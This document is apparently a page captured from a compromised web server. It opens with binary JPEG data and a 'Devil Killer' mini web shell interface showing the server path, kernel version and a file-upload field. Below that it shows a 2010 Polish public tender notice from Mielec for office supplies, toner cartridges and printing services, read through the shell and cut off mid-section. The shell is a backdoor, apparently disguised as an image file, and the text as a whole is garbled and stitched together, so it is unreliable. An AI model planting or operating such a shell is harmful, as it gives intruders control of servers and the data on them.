JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100709/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100709/203080-N-2010.html

<p class="kh_header"><b>Mielec: Dostawa różnego sprzętu i artykułów biurowych, części   
i akcesoriów do aparatów fotokopiujących oraz usługi drukowania</b><br>
<b>Numer ogłoszenia: 203080 - 2010; data zamieszczenia: 09.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejskie Przedsiębiorstwo Gospodarki Komunalnej Sp. z o.o. , ul. Wolności 44, 39-300 Mielec, woj. podkarpackie, tel. 017 5820500, 5820573, faks 017 5820576.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> bip.mpgk.mielec.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa różnego sprzętu i artykułów biurowych, części   
i akcesoriów do aparatów fotokopiujących oraz usługi drukowania.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część I
Dostawa różnego sprzętu i artykułów biurowych
L.P.	ASORTYMENT	ILOŚĆ	JM
1	Bezbarwna taśma klejąca - 18 mm szer. x 30 m	100	szt.
2	Blok z makulatury A4, 100 kartek, kratka	100	szt.
3	Blok z makulatury A5, 100 kartek, kratka	100	szt.
4	Dziurkacz biurkowy, plastikowy,  metalowa podstawa, wykończenia z tworzywa sztucznego, posiadający wskaźnik środka strony i listwę formatową. Średnica otworu 5 mm, rozstaw otworów 80 mm, dziurkowanie do 20 kartek, różne kolory	20	szt.
5	Folia do bindownicy A-4 - przód (100 szt.) bezbarwna	10	Opak.
6	Foliopis wodoodporny, do opisywania płyt CD DVD  tusz szybkoschnący	20	szt.
7	Grzbiety do bindownicy - mix kolor 10 mm (100 szt.)	2	Opak.
8	Grzbiety do bindownicy - mix kolor 12 mm (100 szt.)	2	opak .
9	Grzbiety do bindownicy - mix kolor 14 mm (100 szt.)	2	Opak.
10	Grzbiety do bindownicy - mix kolor 18 mm (100 szt.)	2	opak
11	Grzbiety do bindownicy - mix kolor 22 mm (100 szt.)	2	opak
12	Grzbiety do bindownicy - mix kolor 6 mm (100 szt.)	2	opak
13	Gumka do mazania biała miękka ( wym. 40x20x12 [mm])	30	szt.
14	Gumka recepturka średnica 70 mm	5	kg
15	Kalka do kopiowania A4 maszynowa i ołówkowa (50 szt.)	2	opak
16	Kalkulator biurowy 12 pozycyjny, wyświetlacz podwójnie zasilany, klawisz podwójnego zera, plastikowe duże klawisze, pamięć podstawowa	10	szt.
17	Karta urlopowa A6, 100 szt. w bloczku, wg. załączonego wzoru	100	bloczek
18	Klej w sztyfcie, bezbarwny, bezwonny, zmywalny, min. 20 g	50	szt.
19	Klipy do papieru, metalowe, 19 mm (12 sztuk opak)	20	opak
20	Klipy do papieru, metalowe, 25 mm (12 sztuk opak)	20	opak
21	Klipy do papieru, metalowe, 32 mm (12 sztuk opak.)	20	opak
22	Klipy do papieru, metalowe, 41 mm (12 sztuk opak.)	20	opak
23	Klipy do papieru, metalowe, 51 mm (12 sztuk opak.)	20	opak
24	Koperta bezpieczna ( do transportu gotówki) B4 foliowa, format 275 mm x 375 mm x 35 mm	200	szt.
25	Koperta biała B4 p, poszerzana, bez okienka, samoklejąca z paskiem HK (250 szt.)	5	opak
26	Koperta biała B5 p, bez okna, samoklejąca z paskiem HK (50 szt.)	5	opak
27	Koperta biała C4, bez okienka, samoklejąca z paskiem HK (50 szt.)	10	opak
28	Koperta biała C4 p, poszerzana, bez okienka, samoklejąca z paskiem HK (250 szt.)	10	opak
29	Koperta biała C6, bez okna, samoklejąca SK          (1000 szt.)	5	opak
30	Koperta biała DL, bez okienka, samoklejąca SK        (50 szt.)	40	opak
31	Koperta biała DL, z okienkiem z prawej strony na dole, samoklejąca SK (50 szt.)	1600	opak
32	Koperta biała E4, poszerzana, bez okienka, samoklejąca z paskiem HK (250 szt.)	5	opak
33	Koperta biała ochronna bąbelkowa B4 -SK	20	szt.
34	Koperta biała ochronna bąbelkowa B5 - SK	20	szt.
35	Korektor w długopisie, końcówka metalowa, pojemność: 7 ml 	10	szt.
36	Korektor w taśmie tzw. myszka, szerokość taśmy 5 mm, długość min 6 m.	10	szt.
37	Kostka biurowa kolorowa (notesy samoprzylepne) 400 samoprzylepnych karteczek o wym.: 51x51 [mm]	50	szt.
38	Kostka papierowa 83x83x75 mm kolorowa, nieklejona 	50	szt.
39	Kosz biurowy, plastikowy, pełny na śmieci uchylny 25 l	10	szt.
40	Kosz biurowy na śmieci plastikowy, ażurowy 12 l	5	szt.
41	Książka korespondencji wychodzącej oraz przychodzącej, A4, kolor czarny, granatowy, bordowy, czerwony lub brązowy, 300 kart z zadrukowanymi rubrykami, oprawa introligatorska (twarda, oklejana)	10	szt.
42	Linijka z przezroczystego tworzywa, 20 cm	10	szt.
43	Linijka z przezroczystego tworzywa, 30 cm	10	szt.
44	Linijka z przezroczystego tworzywa, 50 cm	10	szt.
45	Lista obecności A4, 20 kart w bloczku wg. załączonego wzoru	50	bloczki
46	Marker do znakowania powierzchni szorstkich i gładkich, czerwony lub czarny, okrągła końcówka 	20	szt.
47	Notesy samoprzylepne, kolor żółty,  rozmiar 76 x 127 mm	40	opak
48	Notesy samoprzylepne, kolor żółty, rozmiar 38 x 51 mm	40	opak
49	Notesy samoprzylepne, kolor żółty, rozmiar 51 x 76 mm	40	opak
50	Nożyczki biurowe, ostrze ze stali nierdzewnej, wyprofilowany uchwyt z niełamliwego plastiku, wymiar: min. 21 cm.	20	szt.
51	Koszulki do przechowywania dokumentów A4 krystaliczne  
( opakowanie 100 szt.)	50	opak
52	Koszulki do przechowywania dokumentów A5 krystaliczne  
( opakowanie 100 szt.)	20	opak
53	Ofertówka sztywna  L A4 PCV (opakowanie 25 szt.)	50	opak
54	Tyły do bindowania matowe kartony lub skóropodobne A4 (opakowanie 100 szt.)	10	opak
55	Papier kancelaryjny A3, kratka, gramatura 70 g m2  , 250 arkuszy	1	opak
56	Papier kserograficzny A-3, gramatura 80 g m2, białość 161 (500 arkuszy) 	10	ryza
57	Papier kserograficzny A-4, gramatura 80 g m2, białość 161 (500 arkuszy) 	600	ryza
58	Papier pakowy szary - arkusz o wym.: 1300x1000 [mm]	20	arkuszy
59	Papier toaletowy, biały, dwuwarstwowy, maks. średnica 20 cm, 120 mb	600	rolka
60	Papier wizytówkowy, tłoczony, biały, pakowany po 20 arkuszy, gramatura R46 format A4	5	opak
61	Pinezki kolorowe, do tablic korkowych (pakowane po 30 szt.)	20	opak
62	Pinezki trwałe, potrójnie galwanizowane biurowe w kolorze srebrnym 
( opakowanie 100 szt.)	20	opak
63	Przekładki kartonowe z opisem, A4, ze sztywnego kartonu , laminowane na indeksach kolorową taśmą PP, numeryczne lub alfabetyczne, z opisową stroną tytułową.	30	opak
64	Przybornik z tworzywa akrylowego, odporny na pęknięcia, bezbarwny, brązowy lub czarny, przegroda na karteczki 94x94 mm, przegroda na art.piszące (tzw.jeż), przegrody na drobne art.biurowe (gumka, temperówka i inne), min 1 przegroda na stojące dokumenty	20	szt.
65	Ręcznik papierowy, biały, dwuwarstwowy,  w rolce, maks. Średnica: 20 cm, długość:  75 mb	600	szt.
66	Rolki z papieru termicznego, szerokość 57 mm, długość  25 m (opakowanie 10 szt.)	10	opak
67	Rozszywacz do zszywek, wyk. z metalu i plastiku	20	szt.
68	Samoprzylepne etykiety grzbietowe do segregatorów, 50 mm	5	opak
69	Samoprzylepne etykiety grzbietowe do segregatorów, 75 mm	5	opak
70	Segregator A4 z z mechanizmem dźwigniowym okleiną plastikową 50 mm szer.	200	szt.
71	Segregator A4 z mechanizmem dźwigniowym z okleiną plastikową 75 mm szer.	200	szt.
72	Skoroszyt PCV A4 sztywny wpinany z kieszonką na opis	100	szt.
73	Skoroszyt PCV A4 sztywny niewpinany z kieszonką na opis	100	szt.
74	Skoroszyt tekturowy zwykły posiadający metalowe wąsy i miejsce na opis	50	szt.
75	Skorowidz alfabetyczny, w kratkę, 96 kartek A4	10	szt.
76	Skorowidz alfabetyczny, w kratkę, 96 kartek B5	10	szt.
77	Skorowidz alfabetyczny,  w kratkę, 96 kartek 1 2 B5	10	szt.
78	Spinacze biurowe 28 mm (100 szt.)	50	opak
79	Spinacze biurowe 50 mm (100 szt.)	30	opak
80	Sznurek szpagat konopny - rolka 4 dkg	10	rolek
81	Sznurek pakowy (motki 20 m)	10	motka
82	Szpilki srebrne, galwanizowane, 28 mm, pudełko 50 g	5	opak
83	Tablica korkowa w ramie drewnianej, rozmiar 50 x 70 cm	10	szt.
84	Taśma klejąca gęsia skórka	20	szt.
85	Taśma pakowa szara lub bezbarwna 48 mm szer. x 66 m	20	szt.
86	Teczka tekturowa - akta osobowe, z nadrukiem - posiadające miejsce na opis	30	szt.
87	Teczka do podpisu, 20 kartkowa, tektura, rozszerzony grzbiet	10	szt.
88	Teczka kartonowa A4 na hak lub gumkę ( posiada miejsce na opis)	100	szt.
89	Teczka tekturowa biała A4, wiązana, z miejscem na opis	100	szt.
90	Teczka z gumką dwustronnie barwiona i powlekana polipropylenem A4 	100	szt.
91	Teczka z gumką, dwustronnie barwiona i powlekana polipropylenem format A4 o szerokości 20 mm	200	szt.
92	Sztywna podkładka pod dokumenty, z zaciskiem sprężynowym, pokryta folią PCV, format A4, różne kolory	20	szt.
93	Sztywna podkładka pod dokumenty, z zaciskiem sprężynowym, pokryta folią PCV, posiadająca okładkę i miejsce na długopis, format A4, różne kolory	20	szt.
94	Teczka skrzydłowa z rzepem A4 z zamknięciem na dwa rzepy 
( szerokości 40 mm)	100	szt.
95	Teczka kopertowa zamykana na rzep o szerokość grzbietu 20 mm	100	szt.
96	Teczka tekturowa (tektura o grubości 1 mm), różne kolory, format A4, szerokość grzbietu 60 mm, nadruk w kratę, posiada uchwyt i zamek z tworzywa, różne kolory	100	szt.
97	Temperówka z jednym ostrzem, plastikowy pojemnik na wióry 	20	szt.
98	Tusz do stempli, uniwersalny ( buteleczki 25 ml ) czarny, czerwony	10	szt.
99	Worek na śmieci 120 l, czarny, bardzo mocny, 20 szt. na rolce	200	rolka
100	Worek na śmieci 60 l, czarny, bardzo mocny, 30 szt. na rolce	300	rolka
101	Wymienne etykiety grzbietowe do segregatorów, 50 mm	100	szt.
102	Wymienne etykiety grzbietowe do segregatorów, 75 mm	100	szt.
103	Zakładki indeksujące, z możliwością zapisu, fluorescencyjne kolory, samoprzylepne, wym. 20x50. Pakowane 40 szt. x 4	100	szt.
104	Zeszyt A4, twarda okładka, wielokolorowa, kratka, 96 kartek	100	szt.
105	Zeszyt A5, oprawka miękka, wielokolorowa, kratka, 32 kartki	100	szt.
106	Zeszyt A5, oprawka miękka, wielokolorowa, kratka, 60 kartek	100	szt.
107	Zszywacz biurowy, zszywający do 30 kartek, wykonany z tworzywa sztucznego, części mechaniczne wykonane z metalu	20	szt.
108	Zszywki metalowe 24 6 (1000 szt. w opakowaniu), opakowanie tekturowe	100	opak
109	Zszywki metalowe 26 6 (1000 szt. w opakowaniu), opakowanie tekturowe	50	opak
110	Nawilżacz do palców, bezbarwny i bezwonny na bazie gliceryny, pojemność 20 ml	20	szt.
111	Segregator A4 - 80 mm  z twardej tektury z mechanizmem dźwigniowym	100	szt.
112	Pojemnik składany na dokumenty format A4 z PCV 70 mm na grzbiecie etykieta	30	szt.
113	Szuflada na biurko ( wymiary 250x345x 60 mm )	30	szt.
114	Zszywacz elektryczny na baterie zszywający do 20 kartek	5	szt.
115	Długopis automatyczny wykonany z tworzywa sztucznego z ozdobnym metalowym klipsem, posiada metalowy wkład, niebieski tusz, średnica kulki 0,8 mm, szerokość linii pisania 0,5 - 0,7 mm	30	szt.
116	Wkład metalowy do w w długopisu	30	szt.
117	Długopis na łańcuszku stojący	5	szt.
118	Cienkopis kulkowy, czarny, niebieski, czerwony, linia pisania 0,3 mm, obudowa w kolorze atramentu 	50	szt.
119	Długopis automatyczny z cienkim wkładem w metalowej obudowie z zapinką z gumowym uchwytem, średnio piszący	30	szt.
120	Wkłady do w w długopisu	30	szt.
121	Długopis automatyczny z wymiennym wkładem, gumową obudową w kolorze tuszu, końcówki 1 mm ( kolor czarny , niebieski)	30	szt.
122	Wkłady do  w w długopisu	30	szt.
123	Długopis żelowy z wymiennym wkładem żelowym i mechanicznym chowaniem wkładu, gumowy uchwyt, średnica kulki 0,5 mm	30	szt.
124	Wkłady żelowe do ww długopisów	50	szt.
125	Cienkopis - oprawiona metalem końcówka, grubość linii 0,4 mm, skuwka chroniąca cienkopis przed wyschnięciem	50	szt.
126	Zakreślacz fluorescencyjny (różne kolory)	100	szt.
127	Ołówek drewniany (HB)	20	szt.
128	Ołówek z gumką ( HB )	20	szt.
129	Ołówek automatyczny 0,5 mm z gumką	5	szt.
130	Grzbiety zaciskowe ( zaokrąglone krawędzie) na 30 kartek 	100	szt.
131	Grzbiety zaciskowe ( zaokrąglone krawędzie) na 60 kartek 	100	szt.
132	Grzbiety zaciskowe ( zaokrąglone krawędzie) na 80 kartek 	100	szt.
133	Zawieszka na klucze, plastikowa o wym. 15x45 [mm] z okienkiem na opis	100	szt.
134	Teczka akt osobowych oklejona ze sztywnym grzbietem - A-4	20	szt.
135	Nóż do kopert (ostrze ze stali nierdzewnej o dł. 19 cm )	2	szt.
136	Taśma dwustronna 50mm x 25 m	10	szt.
137	Klej do metalu, gumy, szkła, porcelany, drewna i plastiku, tubka o poj. 2 ml	5	szt.
138	Folia do laminowania A4 (opakowanie 100 szt.)	1	opak
139	Torebki ozdobne na prezenty, wymiary 22x 17 [cm]	20	szt.
140	Torebki ozdobne na prezenty, wymiary 23 x 16 [cm]	20	szt.
141	Torebki ozdobne na prezenty, wymiary10 x 16 [cm]	20	szt.
142	Torebki ozdobne na prezenty, wymiary 34,4 x 48 [cm]	20	szt.
143	Pisaki kolorowe ( opakowanie 6 kolorów)	10	opak
144	Płyty DVD - szpindel 50 szt. firmy TDK lub Verbatim	6	opak
145	Płyty CD - szpindel 50 szt. firmy TDK lub Verbatim	4	opak
146	Etykiety 11353 1000 szt.	1	opak
147	Etykiety 99014 220 szt.	6	opak
148	Etykiety 99012 260 szt.	6	opak
149	Aerozol do czyszczenia ekranów LCD, opak. o poj. 300 mln	6	szt.
150	Aerozol do czyszczenia plastików , opak. o poj. 300 mln	6	szt.
151	Chusteczki do czyszczenia ekranów LCD, 100 szt.	3	kpl.
152	Koperta CD	200	szt.
153	Rysiki do ołówków automatycznych 0,5 HB	2	opak
154	Teczka typu meeting wyk. z dwustronnie powlekanej polipropylenem tektury, uchwyt i zamek z tworzywa, szerokość: 20 mm, A-4	50	szt.
Wzór listy obecności - poz. 45
 Wzór karty urlopowej - poz. 17
 
Część II

Dostawa części i akcesoriów do aparatów fotokopiujących

L.p.	Typ	Ilość rocznie	JM
1	Canon C-EXV14	8	szt
2	Canon EP27	8	szt
3	HP 10 C4844AE	36	szt
4	HP 10A Q2610A	6	szt
5	HP 11 C4810A	5	szt
6	HP 11 C4811A	4	szt
7	HP 11 C4812A	4	szt
8	HP 11 C4813A	4	szt
9	HP 11 C4836AE	20	szt
10	HP 11 C4837AE	20	szt
11	HP 11 C4838AE	20	szt
12	HP 12A Q2612A	14	szt
13	HP 13A Q2613A	6	szt
14	HP 15A C7115A	8	szt
15	HP 21 C9351AE	8	szt
16	HP 22 C9352AE	4	szt
17	HP 29 51629AE	4	szt
18	HP 338 C8765EE	4	szt
19	HP 339 C8767EE	2	szt
20	HP 350 CB335EE	6	szt
21	HP 351 CB338EE	3	szt
22	HP 42A Q5942A	28	szt
23	HP 45 51645GE	4	szt
24	HP 49 51649AE	2	szt
25	HP 53A Q7553	22	szt
26	HP 56 C6656AE	12	szt
27	HP 57 C6657AE	6	szt
28	HP 78D (C6578DE) tusz kolorowy, oryginalny	2	szt
29	HP 88 (C9381A) czarno-żółta głowica, oryginalna	2	szt
30	HP 88 (C9382A) czerwono-niebieska głowica, oryginalna	2	szt
31	HP 88 XL (C9391AE) tusz niebieski, zwiększona pojemność, oryginalny	4	szt
32	HP 88 XL (C9392AE) tusz czerwony, zwiększona pojemność, oryginalny	4	szt
33	HP 88 XL (C9393AE) tusz żółty, zwiększona pojemność, oryginalny	4	szt
34	HP 88 XL (C9396AE) tusz czarny, zwiększona pojemność, oryginalny	8	szt
35	HP 92A C4092A	9	szt
36	HP Q2612A	24	szt
37	HP Q6000A	24	szt
38	HP Q6001A	12	szt
39	HP Q6002A	12	szt
40	HP Q6003A	12	szt
41	HP 05A (CE505A)	60	szt
42	Oki 09002303 taśma barwiąca czarna, oryginalna	10	szt
43	Samsung ML-2550 ELS	6	szt
44	Samsung SCX-4720D3 ELS	4	szt
45	Samsung SCX-4720D5 ELS	4	szt
46	Zestaw konserwacyjny HP dla użytkownika, 220 V (Q5422A) - 	3	szt
47	Panasonic KX-FAD93E  KX-FAD39X - urządzenie bębnowe	6	szt
48	Panasonic KX-FAT92E  KXFAT93X - kaseta z tonerem	6	szt
49	HP 36A CB436A	6	szt

1.	Za równoważne materiały eksploatacyjne zamawiający uznaje produkty, których wydajność jest nie mniejsza niż materiału oryginalnego, a proces ich produkcji przebiega zgodnie z normą ISO 9001:2000 lub równoważną. Zgodnie z art. 30 ust. 5 ustawy Pzp. Wykonawca, który oferuje rozwiązania równoważne jest obowiązany wykazać, że oferowany przez niego towar spełnia wymagania określone przez Zamawiającego.
2.	Materiały nie mogą powodować ograniczeń funkcji i możliwości sprzętu oraz jakości wydruku wyspecyfikowanych w warunkach technicznych producenta sprzętu.
3.	Materiały nie mogą ograniczać pełnej współpracy z programem drukarki monitorującym stan zasobników z tuszem lub tonerem.
4.	Ww materiały muszą być dostarczone w oryginalnych opakowaniach oraz posiadać zabezpieczenia, które pozwalają na prawidłowe przechowywanie oraz bezpieczny transport.
5.	Dostarczone materiały eksploatacyjne muszą być fabrycznie nowe i posiadać termin przydatności do użycia nie krótszy niż 12 miesięcy, licząc od dnia ich dostarczenia do siedziby zamawiającego.
6.	Na opakowaniach powinny być wypisane wszystkie typy drukarek, kserokopiarek z którymi tonery są kompatybilne, czyli dopuszczone do stosowania. 
7.	Materiały winny posiadać na produkcie indywidualny kod producenta umożliwiający jednoznaczną identyfikację producenta. 
8.	W przypadku zaoferowania równoważnych materiałów eksploatacyjnych do drukarek w celu potwierdzenia, że  oferowana dostawa odpowiada wymaganiom określonym przez zamawiającego, zamawiający żąda również dołączenia oświadczenia następującej treści: oświadczam, że oferowane w ofercie materiały eksploatacyjne są odpowiednie dla danego rodzaju sprzętu, zobowiązuję się do naprawy urządzenia w autoryzowanym serwisie w przypadku awarii z winy dostarczonego materiału eksploatacyjnego i pokrycia w całości szkód jakie awaria ta spowodowała, oraz że wszystkie wymagane ekspertyzy związane z oceną kwestionowanych, a dostarczonych przeze mnie materiałów, eksploatacyjnych przeprowadzę na własny koszt.

Część III
Usługi drukowania ( papier, koperty -  po stronie wykonawcy) .

Nadruk na koperty ( wg poniższego wzoru)  - biała DL z oknem z prawej strony na dole, samoklejąca.
Nadruki na papierze A - 4 z perforacją ( wg poniższego wzoru) - 100 000 szt.
Nadruki na koperty - 100 000 szt..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7, 30.12.50.00-1, 79.81.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
